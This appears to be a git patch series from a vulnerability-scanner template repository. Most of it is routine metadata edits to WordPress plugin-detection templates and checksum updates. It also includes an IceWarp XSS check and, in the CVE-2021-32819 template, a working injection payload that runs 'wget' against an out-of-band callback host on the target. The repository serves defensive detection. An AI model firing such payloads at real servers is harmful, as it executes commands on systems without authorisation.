a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index c637006d26..4d6702d81a 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-services/ metadata: - max-request: 1 plugin_namespace: woocommerce-services wpscan: https://wpscan.com/plugin/woocommerce-services tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index e020507ccb..42cb8bc409 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce/ metadata: - max-request: 1 plugin_namespace: woocommerce wpscan: https://wpscan.com/plugin/woocommerce tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index c92903fd79..55d6effbf5 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wordfence/ metadata: - max-request: 1 plugin_namespace: wordfence wpscan: https://wpscan.com/plugin/wordfence tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index c25b2c1c48..6786cab703 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wordpress-importer/ metadata: - max-request: 1 plugin_namespace: wordpress-importer wpscan: https://wpscan.com/plugin/wordpress-importer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 4d6dd14d25..784ba22c8a 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wordpress-seo/ metadata: - max-request: 1 plugin_namespace: wordpress-seo wpscan: https://wpscan.com/plugin/wordpress-seo tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index 7ca0870ed6..72ff55e58a 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/worker/ metadata: - max-request: 1 plugin_namespace: worker wpscan: https://wpscan.com/plugin/worker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index 4f0d9be568..8cfaa0f5a9 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-fastest-cache/ metadata: - max-request: 1 plugin_namespace: wp-fastest-cache wpscan: https://wpscan.com/plugin/wp-fastest-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index f3c481b824..85900a01a7 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-file-manager/ metadata: - max-request: 1 plugin_namespace: wp-file-manager wpscan: https://wpscan.com/plugin/wp-file-manager tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index ba214fd7ea..a7ccde0b49 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-google-maps/ metadata: - max-request: 1 plugin_namespace: wp-google-maps wpscan: https://wpscan.com/plugin/wp-google-maps tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 8f5fe8d9a5..422664a98c 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-mail-smtp/ metadata: - max-request: 1 plugin_namespace: wp-mail-smtp wpscan: https://wpscan.com/plugin/wp-mail-smtp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index 0458b13354..f0af3a748a 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-maintenance-mode/ metadata: - max-request: 1 plugin_namespace: wp-maintenance-mode wpscan: https://wpscan.com/plugin/wp-maintenance-mode tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index d570be07bf..f89f1a20b3 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-migrate-db/ metadata: - max-request: 1 plugin_namespace: wp-migrate-db wpscan: https://wpscan.com/plugin/wp-migrate-db tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index ee05e3add8..01fb12d0ad 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-multibyte-patch/ metadata: - max-request: 1 plugin_namespace: wp-multibyte-patch wpscan: https://wpscan.com/plugin/wp-multibyte-patch tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index df2487955f..1773857e15 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-optimize/ metadata: - max-request: 1 plugin_namespace: wp-optimize wpscan: https://wpscan.com/plugin/wp-optimize tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index 79ff01211c..bcd1509c68 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-pagenavi/ metadata: - max-request: 1 plugin_namespace: wp-pagenavi wpscan: https://wpscan.com/plugin/wp-pagenavi tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index 23414b3d1d..c6aca20a60 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-reset/ metadata: - max-request: 1 plugin_namespace: wp-reset wpscan: https://wpscan.com/plugin/wp-reset tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index fba45020e4..56dfdf4a59 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-reviews-plugin-for-google/ metadata: - max-request: 1 plugin_namespace: wp-reviews-plugin-for-google wpscan: https://wpscan.com/plugin/wp-reviews-plugin-for-google tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index 0178c8e9fb..810fc82cde 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-rollback/ metadata: - max-request: 1 plugin_namespace: wp-rollback wpscan: https://wpscan.com/plugin/wp-rollback tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index a04ddc6003..783d381ed8 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-sitemap-page/ metadata: - max-request: 1 plugin_namespace: wp-sitemap-page wpscan: https://wpscan.com/plugin/wp-sitemap-page tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 2ead906817..8bdc600063 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-smushit/ metadata: - max-request: 1 plugin_namespace: wp-smushit wpscan: https://wpscan.com/plugin/wp-smushit tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index dedd2e23b6..ab61cc0338 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-statistics/ metadata: - max-request: 1 plugin_namespace: wp-statistics wpscan: https://wpscan.com/plugin/wp-statistics tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 03cd7137a8..5f6fbc1f75 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-super-cache/ metadata: - max-request: 1 plugin_namespace: wp-super-cache wpscan: https://wpscan.com/plugin/wp-super-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-user-avatar.yaml b/http/technologies/wordpress/plugins/wp-user-avatar.yaml index a68d4b7d78..d67150d038 100644 --- a/http/technologies/wordpress/plugins/wp-user-avatar.yaml +++ b/http/technologies/wordpress/plugins/wp-user-avatar.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-user-avatar/ metadata: - max-request: 1 plugin_namespace: wp-user-avatar wpscan: https://wpscan.com/plugin/wp-user-avatar tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index bf9dfc3ad8..beeba7ca69 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wpcf7-recaptcha/ metadata: - max-request: 1 plugin_namespace: wpcf7-recaptcha wpscan: https://wpscan.com/plugin/wpcf7-recaptcha tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index 47911a86a5..c225df7bfd 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wpcf7-redirect/ metadata: - max-request: 1 plugin_namespace: wpcf7-redirect wpscan: https://wpscan.com/plugin/wpcf7-redirect tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index 1c25b6f488..aaad04cb76 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wpforms-lite/ metadata: - max-request: 1 plugin_namespace: wpforms-lite wpscan: https://wpscan.com/plugin/wpforms-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index b36317acd8..ff750a7d2a 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wps-hide-login/ metadata: - max-request: 1 plugin_namespace: wps-hide-login wpscan: https://wpscan.com/plugin/wps-hide-login tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index 5eb35dd17e..f1e7595ccd 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wpvivid-backuprestore/ metadata: - max-request: 1 plugin_namespace: wpvivid-backuprestore wpscan: https://wpscan.com/plugin/wpvivid-backuprestore tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index ceb2b8d600..4b2769ee46 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/yith-woocommerce-wishlist/ metadata: - max-request: 1 plugin_namespace: yith-woocommerce-wishlist wpscan: https://wpscan.com/plugin/yith-woocommerce-wishlist tags: tech,wordpress,wp-plugin,top-100,top-200 From 9c604ca0cefae4a53b8b88eb908ebbd5e7edf53a Mon Sep 17 00:00:00 2001 From: Imjust0 <38808999+muthumohanprasath@users.noreply.github.com> Date: Sun, 10 Sep 2023 11:54:39 +0530 Subject: [PATCH 0256/1090] Create CVE-2023-39600.yaml --- http/cve/2023/CVE-2023-39600.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 http/cve/2023/CVE-2023-39600.yaml diff --git a/http/cve/2023/CVE-2023-39600.yaml b/http/cve/2023/CVE-2023-39600.yaml new file mode 100644 index 0000000000..9a07f6326d --- /dev/null +++ b/http/cve/2023/CVE-2023-39600.yaml @@ -0,0 +1,23 @@ +id: icewarp-xss-cve-2023-39600 +info: + name: IceWarp Email Client XSS + author: Imjust0 + severity: medium + description: Checking for the XSS on the IceWarp Email Client Application via color parameter + tags: xss,cve2023,icewarp + reference: + - https://medium.com/@katikitala.sushmitha078/cross-site-scripting-reflected-xss-in-icewarp-server-cve-2023-39600-310a7e1c8817 + - https://nvd.nist.gov/vuln/detail/CVE-2023-39600 + - https://cve.report/CVE-2023-39600 +http: + - method: GET + path: + - '{{BaseURL}}/webmail/?color=">' + matchers-condition: and + matchers: + - type: word + words: + - "" + - type: status + status: + - 200 From 356c07ccdcff671e60f80acf35fa41b58f91ed6d Mon Sep 17 00:00:00 2001 From: J4vaovo <128683738+j4vaovo@users.noreply.github.com> Date: Sun, 10 Sep 2023 21:44:34 +0800 Subject: [PATCH 0257/1090] add matchers-condition: and --- http/cves/2021/CVE-2021-32819.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2021/CVE-2021-32819.yaml b/http/cves/2021/CVE-2021-32819.yaml index 45767aa109..d5935d5323 100644 --- a/http/cves/2021/CVE-2021-32819.yaml +++ b/http/cves/2021/CVE-2021-32819.yaml @@ -31,6 +31,7 @@ http: path: - '{{BaseURL}}/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%7C%7C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://{{interactsh-url}}%27);//' + matchers-condition: and matchers: - type: word part: interactsh_protocol # Confirms the HTTP Interaction From 6d37b7bf91457c4d633b80a428c14d5c6e6eb1b6 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 10 Sep 2023 13:56:40 +0000 Subject: [PATCH 0259/1090] Auto Generated Templates Checksum [Sun Sep 10 13:56:40 UTC 2023] :robot: --- templates-checksum.txt | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 7cb2314081..83282dfe1b 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -485,7 +485,7 @@ helpers/wordpress/plugins/pdf-embedder.txt:fe43108f583e1215970ae2e88527d0fbd89b7 helpers/wordpress/plugins/photo-gallery.txt:118daf97168a9a15434efdbbaa6d2dbe5614eec6 helpers/wordpress/plugins/php-compatibility-checker.txt:c117423da3e5e169d36e3111880b709d28e85308 helpers/wordpress/plugins/pinterest-for-woocommerce.txt:01bb70d2c31d6761b11228cfd235f5be71cefeef -helpers/wordpress/plugins/pixelyoursite.txt:b7152d408f074f2e070ff05017700f04ee6bf58d +helpers/wordpress/plugins/pixelyoursite.txt:f358a15cc523a1f31429fce832dc8c0c554fc41b helpers/wordpress/plugins/polylang.txt:c7fc6bde7dbf4cb2d89ab4b2bd57e166ce750ec0 helpers/wordpress/plugins/popup-builder.txt:fc3e46507eb91f2ee9902bdf4b44b9e897b6eea7 helpers/wordpress/plugins/popup-maker.txt:2b3c6ac23cfffce2c714f7553284e912852ab2fe @@ -529,7 +529,7 @@ helpers/wordpress/plugins/use-any-font.txt:051efab22f2c58c6d458654f9abb0b0648c47 helpers/wordpress/plugins/user-role-editor.txt:e4dcf50721abd61e4b9d3234623bdf059936514b helpers/wordpress/plugins/velvet-blues-update-urls.txt:abe23e8d51de58b629ca74fce30438ee71509264 helpers/wordpress/plugins/w3-total-cache.txt:51ddbf27bf181d542a23643649c61739795a6771 -helpers/wordpress/plugins/webp-converter-for-media.txt:2cb2c87ac5ebde3b1ed1d5d55a5747b6f05ee8f7 +helpers/wordpress/plugins/webp-converter-for-media.txt:dd8876f26410100e97e67865e656783fe4e439f6 helpers/wordpress/plugins/webp-express.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/widget-importer-exporter.txt:92dd42eb7b198ffac6578eae5bcfc969383d138c helpers/wordpress/plugins/woo-cart-abandonment-recovery.txt:a9d2178a3e60db128675c6658f16be3165b8e0f1 @@ -557,14 +557,14 @@ helpers/wordpress/plugins/wp-multibyte-patch.txt:01fa77eedfbdd7455e8cf0cf239a4de helpers/wordpress/plugins/wp-optimize.txt:a80f092daaa12261340a5e337b2b07581bbb7e67 helpers/wordpress/plugins/wp-pagenavi.txt:53203701692767a1c2a24e47d94a090230bd8b3f helpers/wordpress/plugins/wp-reset.txt:1a907a1663fa62f8dac219d1a808e2abfcfa4f6a -helpers/wordpress/plugins/wp-reviews-plugin-for-google.txt:634805449eba3016dcc66622332c168ff4aff632 +helpers/wordpress/plugins/wp-reviews-plugin-for-google.txt:426199ebb361539300f123ea7dac4754ee0bef13 helpers/wordpress/plugins/wp-rollback.txt:534467bb06aa6d8cb7e27ce2f48b87742c795cad helpers/wordpress/plugins/wp-seopress.txt:75c41cf137a9a31823a6e465d81658ce9077457c helpers/wordpress/plugins/wp-sitemap-page.txt:1ae2b3145aeda5c94e1cc83b23d74521cf9cc3c5 helpers/wordpress/plugins/wp-smushit.txt:5e74b23ed477d2de0db916790751da05ed4cee9c helpers/wordpress/plugins/wp-statistics.txt:ac32f8a4347b3f038cc4bd52d7ecaa8cd4774179 helpers/wordpress/plugins/wp-super-cache.txt:e9e533b0da8e5546eff821a40fbf7ca20ab9cf7e -helpers/wordpress/plugins/wp-user-avatar.txt:18b9862a81f078662fd384e5150e3cc638d8f73c +helpers/wordpress/plugins/wp-user-avatar.txt:88c9e71b6f0f80feda9e73aae625459cce73b1b8 helpers/wordpress/plugins/wpcf7-recaptcha.txt:255ee3124118ef39f0c2d984854cb0f180c4b1fe helpers/wordpress/plugins/wpcf7-redirect.txt:6dd1f25f2a4f5c9c73793bed06929318969169c0 helpers/wordpress/plugins/wpforms-lite.txt:2269ecf858a6c42d0d3451e7a6857f7331e60f35 @@ -1238,7 +1238,7 @@ http/cves/2019/CVE-2019-11013.yaml:7366a212d9a1754e91010ff5f85c343059edc9d7 http/cves/2019/CVE-2019-11248.yaml:17b65cc75baa9db48c8890da4d0d6b26ea0a303e http/cves/2019/CVE-2019-11370.yaml:1595e81fe1302238e581ff5a0344f98bc447a90d http/cves/2019/CVE-2019-11510.yaml:e40506f727b6461d1f669bc6a516fc6008eeff20 -http/cves/2019/CVE-2019-11580.yaml:785288f1c24d27b95ede4b020e7b82b9731e66a6 +http/cves/2019/CVE-2019-11580.yaml:2d75acbce2c34b66fc36c09a587451338da47a37 http/cves/2019/CVE-2019-11581.yaml:d3dff6113063409b50a4d1dafc6509e1d54491bc http/cves/2019/CVE-2019-11869.yaml:f817212310482f8e070391f63701c3fde5cc5ef3 http/cves/2019/CVE-2019-12276.yaml:27f893f7a856e8a4a18ad436113c1c97fb398db6 @@ -1869,7 +1869,7 @@ http/cves/2021/CVE-2021-32305.yaml:e32d24d73a7793fbdcb86ef264be1c04d5b90750 http/cves/2021/CVE-2021-32618.yaml:24714214b07b23b56635d3af3f4385a709fccc1e http/cves/2021/CVE-2021-32682.yaml:dbc567cddbe5ace9da05bca3347c054cf2430886 http/cves/2021/CVE-2021-32789.yaml:7df42a6f562ca789097d9c835bfca04e3ca52da3 -http/cves/2021/CVE-2021-32819.yaml:017cdc0de8f6be1809a71ffb409738d016a1e25e +http/cves/2021/CVE-2021-32819.yaml:1bc5f6dee4b5bda4cc30c9d0476c3e4a26ae3daa http/cves/2021/CVE-2021-32820.yaml:0faf5402e6aee088e31f4b695fc1d1d59eefca32 http/cves/2021/CVE-2021-32853.yaml:e8d62110f9ec97b7f4c06e70081581e5a8c8c312 http/cves/2021/CVE-2021-3293.yaml:e56df85ba08cbc27a866d9b75cd75ce1c7e57b9a @@ -7056,7 +7056,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e -templates-checksum.txt:d00ddafb19be8038267e33fa0effa090189d40a7 +templates-checksum.txt:67df4231cf65298100e3464428cfa50e72151f2a wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From 5644097cc236e0eec39f8c9f1f5acec9df106038 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 10 Sep 2023 13:58:18 +0000 Subject: [PATCH 0260/1090] TemplateMan Update [Sun Sep 10 13:58:18 UTC 2023] :robot: --- http/technologies/wordpress/plugins/ad-inserter.yaml | 1 + http/technologies/wordpress/plugins/add-to-any.yaml | 1 + http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 + http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 + http/technologies/wordpress/plugins/akismet.yaml | 1 + .../wordpress/plugins/all-404-redirect-to-homepage.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 + .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 + http/technologies/wordpress/plugins/amp.yaml | 1 + http/technologies/wordpress/plugins/antispam-bee.yaml | 1 + http/technologies/wordpress/plugins/astra-sites.yaml | 1 + http/technologies/wordpress/plugins/astra-widgets.yaml | 1 + http/technologies/wordpress/plugins/autoptimize.yaml | 1 + http/technologies/wordpress/plugins/backwpup.yaml | 1 + http/technologies/wordpress/plugins/better-search-replace.yaml | 1 + http/technologies/wordpress/plugins/better-wp-security.yaml | 1 + .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 + http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 + http/technologies/wordpress/plugins/breeze.yaml | 1 + http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 + .../technologies/wordpress/plugins/child-theme-configurator.yaml | 1 + http/technologies/wordpress/plugins/classic-editor.yaml | 1 + http/technologies/wordpress/plugins/classic-widgets.yaml | 1 + .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 + http/technologies/wordpress/plugins/cmb2.yaml | 1 + http/technologies/wordpress/plugins/coblocks.yaml | 1 + http/technologies/wordpress/plugins/code-snippets.yaml | 1 + http/technologies/wordpress/plugins/coming-soon.yaml | 1 + http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7.yaml | 1 + http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 + http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 + http/technologies/wordpress/plugins/cookie-notice.yaml | 1 + http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 + .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 + http/technologies/wordpress/plugins/custom-css-js.yaml | 1 + http/technologies/wordpress/plugins/custom-fonts.yaml | 1 + http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 + http/technologies/wordpress/plugins/disable-comments.yaml | 1 + http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/duplicate-page.yaml | 1 + http/technologies/wordpress/plugins/duplicate-post.yaml | 1 + http/technologies/wordpress/plugins/duplicator.yaml | 1 + .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 + http/technologies/wordpress/plugins/easy-fancybox.yaml | 1 + http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 + http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 + http/technologies/wordpress/plugins/elementor.yaml | 1 + http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 + http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 + http/technologies/wordpress/plugins/envato-elements.yaml | 1 + .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 + http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 + .../technologies/wordpress/plugins/facebook-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 + .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 + http/technologies/wordpress/plugins/flamingo.yaml | 1 + http/technologies/wordpress/plugins/fluentform.yaml | 1 + http/technologies/wordpress/plugins/font-awesome.yaml | 1 + .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/formidable.yaml | 1 + http/technologies/wordpress/plugins/forminator.yaml | 1 + http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 + http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 + .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 + .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 + http/technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 + http/technologies/wordpress/plugins/google-site-kit.yaml | 1 + .../technologies/wordpress/plugins/google-sitemap-generator.yaml | 1 + http/technologies/wordpress/plugins/gtranslate.yaml | 1 + http/technologies/wordpress/plugins/gutenberg.yaml | 1 + http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 + .../wordpress/plugins/header-footer-code-manager.yaml | 1 + http/technologies/wordpress/plugins/header-footer-elementor.yaml | 1 + http/technologies/wordpress/plugins/header-footer.yaml | 1 + http/technologies/wordpress/plugins/health-check.yaml | 1 + http/technologies/wordpress/plugins/hello-dolly.yaml | 1 + http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 + http/technologies/wordpress/plugins/imagify.yaml | 1 + http/technologies/wordpress/plugins/imsanity.yaml | 1 + .../wordpress/plugins/insert-headers-and-footers.yaml | 1 + http/technologies/wordpress/plugins/instagram-feed.yaml | 1 + 